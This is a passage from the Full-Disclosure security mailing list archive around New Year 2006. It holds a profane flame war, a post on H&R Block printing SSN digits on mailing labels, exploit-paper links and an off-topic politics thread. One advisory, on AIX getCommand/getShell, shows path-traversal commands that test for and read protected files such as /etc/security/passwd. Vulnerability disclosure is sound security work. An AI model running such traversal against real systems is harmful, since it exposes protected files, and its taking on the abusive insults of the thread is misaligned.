headers
Joe Average | 1 Jan 2006 02:26
Picon

Re: Important announcement about CXS

And, *What are you?*
 
Regards,
 
CXS
 
On 12/31/05, InfoSecBOFH <infosecbofh <at> gmail.com> wrote:
haha, I know you are what am I....

On 12/31/05, Joe Average < yahooinsider <at> gmail.com> wrote:
> You're the only "fuckbag" we can see right now.
>
> Regards,
>
> CXS
>
>
> On 12/31/05, InfoSecBOFH < infosecbofh <at> gmail.com> wrote:
> >
> > yaaaah!  Good riddance fuckbag.
> >
> > Whats the matter, not getting enough attention so you troll out with
> > this email.  NO ONE CARES if you fuck off.
> >
> > On 12/31/05, Joe Average <yahooinsider <at> gmail.com> wrote:
> > > We're closing up public life as 2006 fast approaches landfall and George
> W
> > > Bush's iPod gets filled up with tracks, so we're hitting the underworld
> > > again, and bidding everyone a good bye. http://n3td3v.blogspot.com
> > >
> > > [Side nugget]
> > > Bush authorised a missle to strike a suspected compound where they
> thought
> > > Saddam was living, hours before the planned operations of the Iraq war
> began
> > > (Do you remember?). It was a strike that would have flattened the
> compound
> > > and anyone within it, and all the residential homes around it. Saddam
> wasn't
> > > in that compound it was found later. The intelligence services were so
> > > convinced he was there,  they started the beginning of the war with a
> strike
> > > against him (to kill, with no body parts to show to the world media).
> > >
> > > However, months after the war had started, they found Saddam hidden in a
> > > hole in the ground? Helped the guy out the ground, and gave him a health
> > > check, including teeth, and sent him to jail awaiting trail.
> > >
> > > You work out the math.
> > >
> > > U.S.A media bubble forever
> > >
> > > CXS
> > > _______________________________________________
> > > Full-Disclosure - We believe in it.
> > > Charter:
> > > http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
> > >
> > >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Permalink | Reply | 1 comment |
headers
InfoSecBOFH | 1 Jan 2006 07:07
Picon

Re: Important announcement about CXS

Pretty much your daddy little bitch.

On 12/31/05, Joe Average <yahooinsider <at> gmail.com> wrote:
> And, *What are you?*
>
> Regards,
>
> CXS
>
> On 12/31/05, InfoSecBOFH <infosecbofh <at> gmail.com> wrote:
> >
> > haha, I know you are what am I....
> >
> > On 12/31/05, Joe Average < yahooinsider <at> gmail.com> wrote:
> > > You're the only "fuckbag" we can see right now.
> > >
> > > Regards,
> > >
> > > CXS
> > >
> > >
> > > On 12/31/05, InfoSecBOFH < infosecbofh <at> gmail.com> wrote:
> > > >
> > > > yaaaah!  Good riddance fuckbag.
> > > >
> > > > Whats the matter, not getting enough attention so you troll out with
> > > > this email.  NO ONE CARES if you fuck off.
> > > >
> > > > On 12/31/05, Joe Average <yahooinsider <at> gmail.com> wrote:
> > > > > We're closing up public life as 2006 fast approaches landfall and
> George
> > > W
> > > > > Bush's iPod gets filled up with tracks, so we're hitting the
> underworld
> > > > > again, and bidding everyone a good bye. http://n3td3v.blogspot.com
> > > > >
> > > > > [Side nugget]
> > > > > Bush authorised a missle to strike a suspected compound where they
> > > thought
> > > > > Saddam was living, hours before the planned operations of the Iraq
> war
> > > began
> > > > > (Do you remember?). It was a strike that would have flattened the
> > > compound
> > > > > and anyone within it, and all the residential homes around it.
> Saddam
> > > wasn't
> > > > > in that compound it was found later. The intelligence services were
> so
> > > > > convinced he was there,  they started the beginning of the war with
> a
> > > strike
> > > > > against him (to kill, with no body parts to show to the world
> media).
> > > > >
> > > > > However, months after the war had started, they found Saddam hidden
> in a
> > > > > hole in the ground? Helped the guy out the ground, and gave him a
> health
> > > > > check, including teeth, and sent him to jail awaiting trail.
> > > > >
> > > > > You work out the math.
> > > > >
> > > > > U.S.A media bubble forever
> > > > >
> > > > > CXS
> > > > > _______________________________________________
> > > > > Full-Disclosure - We believe in it.
> > > > > Charter:
> > > > >
> http://lists.grok.org.uk/full-disclosure-charter.html
> > >> Hosted and sponsored by Secunia - http://secunia.com/
> > > > >
> > > > >
> > > > _______________________________________________
> > > > Full-Disclosure - We believe in it.
> > > > Charter:
> > > http://lists.grok.org.uk/full-disclosure-charter.html
> > > > Hosted and sponsored by Secunia - http://secunia.com/
> > > >
> > >
> > >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Permalink | Reply | 0 comments |
headers
Nancy Kramer | 1 Jan 2006 08:17

Re: Important announcement about CXS

Hello,

It is New Years.  Why can't all of you just have a few drinks and paw a 
person of the gender you are attracted to like normal human beings.

Regards,

Nancy Kramer
Webmaster http://www.americandreamcars.com
Free Color Picture Ads for Collector Cars
One of the Ten Best Places To Buy or Sell a Collector Car on the Web

At 01:07 AM 1/1/2006, InfoSecBOFH wrote:

>Pretty much your daddy little bitch.
>
>On 12/31/05, Joe Average <yahooinsider <at> gmail.com> wrote:
> > And, *What are you?*
> >
> > Regards,
> >
> > CXS
> >
> > On 12/31/05, InfoSecBOFH <infosecbofh <at> gmail.com> wrote:
> > >
> > > haha, I know you are what am I....
> > >
> > > On 12/31/05, Joe Average < yahooinsider <at> gmail.com> wrote:
> > > > You're the only "fuckbag" we can see right now.
> > > >
> > > > Regards,
> > > >
> > > > CXS
> > > >
> > > >
> > > > On 12/31/05, InfoSecBOFH < infosecbofh <at> gmail.com> wrote:
> > > > >
> > > > > yaaaah!  Good riddance fuckbag.
> > > > >
> > > > > Whats the matter, not getting enough attention so you troll out with
> > > > > this email.  NO ONE CARES if you fuck off.
> > > > >
> > > > > On 12/31/05, Joe Average <yahooinsider <at> gmail.com> wrote:
> > > > > > We're closing up public life as 2006 fast approaches landfall and
> > George
> > > > W
> > > > > > Bush's iPod gets filled up with tracks, so we're hitting the
> > underworld
> > > > > > again, and bidding everyone a good bye. http://n3td3v.blogspot.com
> > > > > >
> > > > > > [Side nugget]
> > > > > > Bush authorised a missle to strike a suspected compound where they
> > > > thought
> > > > > > Saddam was living, hours before the planned operations of the Iraq
> > war
> > > > began
> > > > > > (Do you remember?). It was a strike that would have flattened the
> > > > compound
> > > > > > and anyone within it, and all the residential homes around it.
> > Saddam
> > > > wasn't
> > > > > > in that compound it was found later. The intelligence services were
> > so
> > > > > > convinced he was there,  they started the beginning of the war with
> > a
> > > > strike
> > > > > > against him (to kill, with no body parts to show to the world
> > media).
> > > > > >
> > > > > > However, months after the war had started, they found Saddam hidden
> > in a
> > > > > > hole in the ground? Helped the guy out the ground, and gave him a
> > health
> > > > > > check, including teeth, and sent him to jail awaiting trail.
> > > > > >
> > > > > > You work out the math.
> > > > > >
> > > > > > U.S.A media bubble forever
> > > > > >
> > > > > > CXS
> > > > > > _______________________________________________
> > > > > > Full-Disclosure - We believe in it.
> > > > > > Charter:
> > > > > >
> > http://lists.grok.org.uk/full-disclosure-charter.html
> > > >> Hosted and sponsored by Secunia - http://secunia.com/
> > > > > >
> > > > > >
> > > > > _______________________________________________
> > > > > Full-Disclosure - We believe in it.
> > > > > Charter:
> > > > http://lists.grok.org.uk/full-disclosure-charter.html
> > > > > Hosted and sponsored by Secunia - http://secunia.com/
> > > > >
> > > >
> > > >
> > > _______________________________________________
> > > Full-Disclosure - We believe in it.
> > > Charter:
> > http://lists.grok.org.uk/full-disclosure-charter.html
> > > Hosted and sponsored by Secunia - http://secunia.com/
> > >
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter:
> > http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
> >
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
>
>
>--
>No virus found in this incoming message.
>Checked by AVG Anti-Virus.
>Version: 7.1.371 / Virus Database: 267.14.9/217 - Release Date: 12/30/2005

--

-- 
No virus found in this outgoing message.
Checked by AVG Anti-Virus.
Version: 7.1.371 / Virus Database: 267.14.9/217 - Release Date: 12/30/2005

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Permalink | Reply | 0 comments |
headers
crazy frog crazy frog | 1 Jan 2006 09:03
Picon

Re: Important announcement about CXS

rofl!!! miss u n3td3v :(

On 12/31/05, Joe Average <yahooinsider <at> gmail.com> wrote:
> We're closing up public life as 2006 fast approaches landfall and George W
> Bush's iPod gets filled up with tracks, so we're hitting the underworld
> again, and bidding everyone a good bye. http://n3td3v.blogspot.com
>
> [Side nugget]
> Bush authorised a missle to strike a suspected compound where they thought
> Saddam was living, hours before the planned operations of the Iraq war began
> (Do you remember?). It was a strike that would have flattened the compound
> and anyone within it, and all the residential homes around it. Saddam wasn't
> in that compound it was found later. The intelligence services were so
> convinced he was there,  they started the beginning of the war with a strike
> against him (to kill, with no body parts to show to the world media).
>
> However, months after the war had started, they found Saddam hidden in a
> hole in the ground? Helped the guy out the ground, and gave him a health
> check, including teeth, and sent him to jail awaiting trail.
>
> You work out the math.
>
> U.S.A media bubble forever
>
> CXS
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>

--
ting ding ting ding ting ding
ting ding ting ding ding
i m crazy frog :)
"oh yeah oh yeah...
 another wannabe, in hackerland!!!
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Permalink | Reply | 0 comments |
headers
Eric Sites | 1 Jan 2006 09:08
Favicon

New WMF exploit confirmed in spam attacks

http://sunbeltblog.blogspot.com/2005/12/new-wmf-exploit-confirmed-in-spa
m.html

Eric Sites 
VP of Research & Development
Sunbelt Software
eric <at> sunbelt-software.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Permalink | Reply | 0 comments |
headers
XFOCUS Security Team | 1 Jan 2006 09:19

[xfocus-SD-060101]AIX getCommand&getShell two vulnerabilities

Title:[xfocus-SD-060101]AIX getCommand&getShell two vulnerabilities

Affected version : aix5.3 ml03,Other versions not test,
                       should also be affected.
Vendor: http://www.ibm.com/
Where: Local

XFOCUS (http://www.xfocus.org) had already discovered
some vulnerabilities in getCommand&getShell.

After apply newest patch,getCommand&getShell still have two
vulnerabilities,That is
1: exploit that,a attacker can determine file be exist or not,which
should can't readed
2: exploit that,a attacker can read in any shell document(include no
permission file) has the cd operation the following partial content.

example test:
-bash-3.00$./getCommand.new ../../../../../../etc/security/passwd
-bash-3.00$./getCommand.new ../../../../../../etc/security/passwd.aa
fopen:  No such file or directory
-bash-3.00$ ls -ld /etc/security/
drwxr-x--- 4 root security 512  2005-12-22 21:09 /etc/security/
-bash-3.00$ ls -l /tmp/k.sh -rwx------ 1 root system 79 2005-12-22 23:40
/tmp/k.sh
-bash-3.00$./getCommand.new ../../../../../tmp/k.sh

ps -ef > /tmp/log. $$
grep test /tmp/log.
$$ rm /tmp/log. $$

-bash-3.00$

TIME LINE:
December,26 2005 - Initial vendor notification
.....Waiting.....Waiting....
January 1, 2006 - Public disclosure(vendor not reply)

--EOF

--

-- 

Kind Regards,

---
XFOCUS Security Team
http://www.xfocus.org

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Permalink | Reply | 0 comments |
headers
Troy Solo | 1 Jan 2006 18:55

H&R Block Tax Service sends mail with SSN on the label.

My wife received this snail mail letter yesterday:

"Recently we mailed you a free copy of our TaxCut software.  We believe 
that this complimentary software will meet your 2006 tax preparation 
needs, based on our prior experience with you as an H&R Block client. 
We hope that you will try TaxCut and find it to be a great solution for 
filing your next tax return.

However, since we sent you this CD, we have become aware of a mail 
production situation that has affected a small percentage of recipients, 
including you.  Due to human error in developing the mailing list, the 
digits of your social security number (SSN) were used as part of your 
mailing label's source code, a string of more than 40 numbers and 
characters.  Fortunately, these digits were embedded in the middle of 
the string, and they were not formatted in any manner that would 
identify them as an SSN.

Nevertheless, we sincerely apologize for this inadvertent error, which 
is completely inconsistent with out strict policies to protect out 
clients' privacy.  Our internal policies limit the use of client SSNs 
for purposes other than tax preparation.  Furthermore, our internal 
procedures require that mailing source codes are formulated in a manner 
that excludes use of any sensitive or confidential information.  Please 
know that we have conducted a thorough internal review of this matter, 
and are taking actions to ensure this does not re-occur.

Again, please understand that the digits of your SSN were embedded in 
the middle of a lengthy source code, and they were not formatted in a 
manner that identifies them as an SSN.  As a result, we believe that 
exposure of your SSN digits was limited to you alone, since you are the 
only person who would recognize their significance.  Nonetheless, we 
suggest that you destroy the wrapper and mailing label of the free 
TaxCut CD we sent you.  If you would like more information about this 
incident, please visit www.taxcut.com/answers, a special Website that 
contains additional details and an e-mail link for contacting us with 
your questions.

On behalf of more than 100,000 associates of H&R Block, allow me to 
apologize for this unfortunate situation.  Through 50 tax seasons, H&R 
Block has earned a reputation as a valued, trustworthy ally to our 
clients, and we sincerely hope that you will find the free TaxCut CD and 
our information packed taxcut.com Website to be helpful tools for the 
2006 tax filing season.

Sincerely,

Tom Allanson
Senior Vice President & General Manager
H&R Block Digital Tax Solutions

4400 Main Street Kansas City, MO 64111
www.taxcut.com"

---------------------------------

The part about "the exposure of the SSN was limited to you alone because 
you are the only person who would recognize your number" kills me.

--

-- 
/*
/*  Troy Solo
/*  <solo <at> dok.org>
/*  Si Hoc Legere Scis Nimium Eruditionis Habes
/*
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Permalink | Reply | 1 comment |
headers
Exibar | 1 Jan 2006 19:20

Re: H&R Block Tax Service sends mail with SSN on thelabel.

"limited to you alone..."  sure, all it takes is for one person to figure
out how many digits into this source code that te SSN begins, and there you
go.  Not exactly rocket science there...

  Exibar

----- Original Message ----- 
From: "Troy Solo" <solo <at> dok.org>
To: <full-disclosure <at> lists.grok.org.uk>
Cc: <funsec <at> linuxbox.org>
Sent: Sunday, January 01, 2006 12:55 PM
Subject: [Full-disclosure] H&R Block Tax Service sends mail with SSN on
thelabel.

> My wife received this snail mail letter yesterday:
>
> "Recently we mailed you a free copy of our TaxCut software.  We believe
> that this complimentary software will meet your 2006 tax preparation
> needs, based on our prior experience with you as an H&R Block client.
> We hope that you will try TaxCut and find it to be a great solution for
> filing your next tax return.
>
> However, since we sent you this CD, we have become aware of a mail
> production situation that has affected a small percentage of recipients,
> including you.  Due to human error in developing the mailing list, the
> digits of your social security number (SSN) were used as part of your
> mailing label's source code, a string of more than 40 numbers and
> characters.  Fortunately, these digits were embedded in the middle of
> the string, and they were not formatted in any manner that would
> identify them as an SSN.
>
> Nevertheless, we sincerely apologize for this inadvertent error, which
> is completely inconsistent with out strict policies to protect out
> clients' privacy.  Our internal policies limit the use of client SSNs
> for purposes other than tax preparation.  Furthermore, our internal
> procedures require that mailing source codes are formulated in a manner
> that excludes use of any sensitive or confidential information.  Please
> know that we have conducted a thorough internal review of this matter,
> and are taking actions to ensure this does not re-occur.
>
> Again, please understand that the digits of your SSN were embedded in
> the middle of a lengthy source code, and they were not formatted in a
> manner that identifies them as an SSN.  As a result, we believe that
> exposure of your SSN digits was limited to you alone, since you are the
> only person who would recognize their significance.  Nonetheless, we
> suggest that you destroy the wrapper and mailing label of the free
> TaxCut CD we sent you.  If you would like more information about this
> incident, please visit www.taxcut.com/answers, a special Website that
> contains additional details and an e-mail link for contacting us with
> your questions.
>
> On behalf of more than 100,000 associates of H&R Block, allow me to
> apologize for this unfortunate situation.  Through 50 tax seasons, H&R
> Block has earned a reputation as a valued, trustworthy ally to our
> clients, and we sincerely hope that you will find the free TaxCut CD and
> our information packed taxcut.com Website to be helpful tools for the
> 2006 tax filing season.
>
> Sincerely,
>
> Tom Allanson
> Senior Vice President & General Manager
> H&R Block Digital Tax Solutions
>
> 4400 Main Street Kansas City, MO 64111
> www.taxcut.com"
>
> ---------------------------------
>
> The part about "the exposure of the SSN was limited to you alone because
> you are the only person who would recognize your number" kills me.
>
> -- 
> /*
> /*  Troy Solo
> /*  <solo <at> dok.org>
> /*  Si Hoc Legere Scis Nimium Eruditionis Habes
> /*
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Permalink | Reply | 0 comments |
headers
'mercy | 1 Jan 2006 16:25

Exploiting Uninitialized Data

Hey,

http://www.felinemenace.org/~mercy/papers/UBehavior/UBehavior.zip - info
on exploiting uninitialized data if anybody is interested.

Greets,
mercy.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Permalink | Reply | 0 comments |
headers
TJ | 2 Jan 2006 04:58
Picon
Gravatar

RE: complaints about the government spying! (OFFTOPIC)

"And for most of that time, we seemed to manage with coping without
surrendering our civil liberties"

Yes, we have been overly complacent ... which is why more of us have been /
are being murdered.  It sounds like some have no problem with an endless
string of 9/11-like attacks, both within the US and abroad.  

I can only hope that isn't the case.

And, while I agree this is off-topic for this list - please note that both
sides of this argument are equally guilty of being off-topic.
/TJ
-----Original Message-----
From: full-disclosure-bounces <at> lists.grok.org.uk
[mailto:full-disclosure-bounces <at> lists.grok.org.uk] On Behalf Of
Valdis.Kletnieks <at> vt.edu
Sent: Thursday, December 29, 2005 5:34 PM
To: Paul Schmehl
Cc: full-disclosure <at> lists.grok.org.uk
Subject: Re: [Full-disclosure] complaints about the governemnt spying! 

On Thu, 29 Dec 2005 14:37:44 CST, Paul Schmehl said:

> And the funniest thing of all is that they got stupid Americans all riled 
> about about civil and privacy rights in the process, completely losing 
> track of what's really important - preventing another attack on our soil.

You have this so completely ass-backwards that you obviously have no clue
what this country *used* to stand for.

> Or have you already forgetten that terrorists have been killing us (and 
> many others around the world) since the 1970's without pause? 

And for most of that time, we seemed to manage with coping without
surrendering
our civil liberties.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Permalink | Reply | 0 comments |

Gmane